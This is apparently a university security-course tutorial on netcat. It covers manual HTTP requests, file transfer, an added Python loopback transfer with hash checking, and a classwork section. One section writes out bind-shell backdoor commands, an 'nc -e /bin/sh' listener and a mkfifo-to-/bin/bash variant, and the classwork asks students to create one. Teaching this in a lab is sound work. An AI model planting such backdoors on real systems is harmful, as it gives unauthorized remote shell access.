Netcat

Introduction

Netcat is often described as the Swiss Army knife of TCP/IP. It does a lot, and knowing how to use it can be invaluable in security work. It is not the optimal tool for many jobs, but it is a lot quicker to reach for than reinventing the wheel.

Basic usage

Netcat's simplest use is as a replacement for telnet. Try the following:

$ nc www.northwestern.edu 80
GET / HTTP/1.1^M
Host: www.northwestern.edu^M
^M

Where it says ^M, you actually have to press control-v and then enter. This inserts the carriage return that HTTP requires before each newline. Optionally, you can add more headers to your request:

$ nc www.northwestern.edu 80
GET / HTTP/1.1^M
Host: www.northwestern.edu^M
Accept: text/html;q=0.9,text/plain;q=0.8^M
User-Agent: Mozilla/5.0 (Unknown; en-us)^M
Accept-Language: en-us,en;q=0.5^M
^M

Another way to do this (which allows you to avoid pressing control-v all the time) is to pipe the output of some command to netcat. Here's an example:

$ ruby -e 'print "GET / HTTP/1.1\r\nHost: www.northwestern.edu\r\n\r\n"' | nc www.northwestern.edu 80

Common command line flags

Transferring files

One thing you might come across is a host you can access but onto which it is hard to get files. Netcat can easily transfer files for you. On the machine that you want to receive the file:

$ nc -vv -l 3000 > file

And on the machine from which you want to send the file:

$ nc -vv hostname 3000 < file

These simple commands just shovel the contents of a file over a TCP/IP connection. If you try this, note that in many cases these transfers will be filtered by a firewall. Try transferring a file from a machine in the Wilkinson lab to hamsa.
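
Because netcat only shovels bytes, nothing tells the receiving side whether the file arrived complete and unmodified, so compare a hash on both ends afterwards. The following Python program is an added example, not part of the original tutorial or of netcat itself: it re-creates the two commands above over loopback (receiver reads until the sender closes, sender writes the file and closes) and compares SHA-256 digests; the payload is a constructed sample standing in for "file".

```python
import hashlib
import socket
import threading

# Constructed sample payload standing in for "file" in the two nc commands above.
SAMPLE_FILE = b"netcat tutorial sample payload\n" * 2000  # ~62 KB, spans several recv() calls

def sha256_hex(data: bytes) -> str:
    # Digest compared out of band afterwards; nc itself verifies nothing.
    return hashlib.sha256(data).hexdigest()

def receive_file(listener: socket.socket, out: bytearray) -> None:
    # Receiver, like `nc -l 3000 > file`: take one connection and append bytes until EOF.
    conn, _ = listener.accept()
    with conn:
        while True:
            chunk = conn.recv(65536)
            if not chunk:  # sender closed its end: the stream is complete
                break
            out.extend(chunk)

def send_file(host: str, port: int, data: bytes) -> None:
    # Sender, like `nc hostname 3000 < file`: write everything, then close so the receiver sees EOF.
    with socket.create_connection((host, port)) as conn:
        conn.sendall(data)
        conn.shutdown(socket.SHUT_WR)

def transfer_and_verify(data: bytes = SAMPLE_FILE) -> dict:
    # Run both sides over loopback and compare digests, as sha256sum on each host would.
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS choose a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    received = bytearray()
    receiver = threading.Thread(target=receive_file, args=(listener, received))
    receiver.start()
    send_file("127.0.0.1", port, data)
    receiver.join()
    listener.close()
    sent_digest, got_digest = sha256_hex(data), sha256_hex(bytes(received))
    return {"bytes": len(received), "sent_sha256": sent_digest,
            "received_sha256": got_digest, "intact": sent_digest == got_digest}

if __name__ == "__main__":
    print(transfer_and_verify())
```

With real netcat the same check is `sha256sum file` on each host after the transfer; a mismatch means the connection was cut or filtered before the whole file arrived.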

Creating a simple backdoor

Netcat has the ability to execute a program when it receives a connection. This feature can be used to easily create a backdoor to a machine.

$ nc -l -p 5300 -e /bin/sh

And now from any machine:

$ nc target_ip 5300

However, the -e flag has been deprecated in more recent versions of netcat. You can emulate this behavior with something like the following, though it's not as quiet:

$ mkfifo foo; nc -l 5300 0<foo | /bin/bash 1>foo

Additional

There is a lot that you can do with netcat. A short tutorial doesn't quite do it justice. If you have time, it would be good to read through the man page (man netcat) or to search online for things to try with it.

Classwork

Show that you can successfully download the webpage www.google.com. Transfer an arbitrary file using netcat. Show that you can create a netcat backdoor, and demonstrate an understanding of netcat's usefulness as both a TCP client and a TCP server.